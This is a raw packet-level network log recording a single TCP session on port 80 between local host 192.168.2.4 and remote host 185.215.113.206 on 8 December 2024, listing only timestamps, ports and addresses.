Dec 8, 2024 19:52:29.873155117 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.873234034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.873291969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.874010086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.874049902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.874128103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.874164104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.874771118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.874814034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.874856949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.874896049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.875552893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.875587940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.875602007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.875638962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.876343012 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.876382113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.876455069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.876490116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.877150059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.877192974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.877322912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.877357006 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.878027916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.878083944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.878117085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.878156900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.878958941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.878997087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.879025936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.879060984 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.879659891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.879694939 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.879812002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.879847050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.880606890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.880645990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.880681992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.880723000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.881335020 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.881371021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.881423950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.881460905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.882102013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.882148027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.882179976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.882220030 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.882905960 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.882945061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.883027077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.883061886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.883675098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.883722067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.038839102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.038896084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.038961887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.038999081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.039117098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.039180994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.039498091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.039550066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.039959908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.039973021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.040007114 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.040019035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.040860891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.040904999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.041188955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.041248083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.041570902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.041613102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.042083025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.042128086 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.042558908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.042603016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.042671919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.042715073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.043180943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.043229103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.043435097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.043482065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.044064999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.044111013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.044145107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.044224977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057485104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057593107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057605982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057641983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057653904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057657957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057701111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057743073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057754040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057765007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057780027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057802916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057863951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057898998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057914972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057946920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.057946920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057959080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.057991028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058130026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058237076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058248997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058259010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058271885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058278084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058283091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058293104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058295012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058305025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058317900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058332920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058355093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058495998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058614016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058624029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058641911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058654070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058654070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058665037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058679104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058681011 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058692932 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058703899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058703899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058715105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058727026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058727980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058737040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058746099 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058751106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058762074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.058770895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.058795929 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.059133053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.059287071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.059329033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.059509039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.059551001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.059613943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.060303926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.060343981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.060422897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.060499907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.061115026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.061131954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.061172962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.061918974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.062081099 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.062120914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.062714100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.062756062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.062829018 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.063560009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.063597918 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.063674927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.064342022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.064387083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.064407110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.064440966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.065144062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.065257072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.065303087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.066004992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.066268921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.066315889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.066792011 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.066831112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.066906929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.067604065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.067646027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.067682028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.068438053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.068481922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.068543911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.068584919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.069205999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.069328070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.069371939 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.070015907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.070211887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.070257902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.070843935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.070882082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.070944071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.071660042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.071697950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.071767092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.072473049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.072493076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.072516918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.072518110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.072552919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.073359013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.073398113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.073482990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.073519945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.074100018 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.074139118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.074192047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.074229002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.074920893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.074959993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.074995041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.075031042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.075848103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.075867891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.075910091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.076514006 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.076648951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.076690912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.077339888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.077461004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.077510118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.078191996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.078310013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.078356028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.079001904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.079046965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.079129934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.079787970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.079830885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.079910040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.080499887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.080676079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.080822945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.080862045 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.081403017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.081779003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.231034040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.231179953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.231262922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.231333017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.231408119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.231443882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.232189894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.232250929 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.232305050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.232527971 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.233088017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.233129025 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.233196974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.233936071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.233972073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.233983994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.234030008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.234781027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.234831095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.234989882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.235124111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.235480070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.235529900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.235590935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.236294985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.236344099 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.236349106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.236505032 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.237174988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.237194061 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.237237930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.238076925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.238353014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.238400936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.238735914 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.238822937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.238831043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.239495039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.239556074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.239598036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.240303993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.240360975 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.240403891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.240446091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.241107941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.241252899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.241305113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.241925955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.242103100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.242269993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.242808104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.242929935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.242990017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.243685961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.243705988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.243742943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.244544983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.244596004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.244648933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.245174885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.245224953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.245434999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.245996952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.246043921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.246104002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.246805906 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.246860027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.246912003 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.246948957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.247656107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.247757912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.247802973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.248471022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.248636007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.248681068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.249361992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.249407053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.249476910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.250138998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.250190973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.250248909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.251032114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.251061916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.251097918 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.251674891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.251720905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.251868010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.252500057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.252527952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.252561092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.252821922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.252870083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.253385067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.253436089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.253506899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.253546953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.254180908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.254234076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.254364014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.254410028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.255019903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.255060911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.255125999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.255198956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.255840063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.255889893 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.256026030 CET	80	49748	185.215.113.206	192.168.2.4
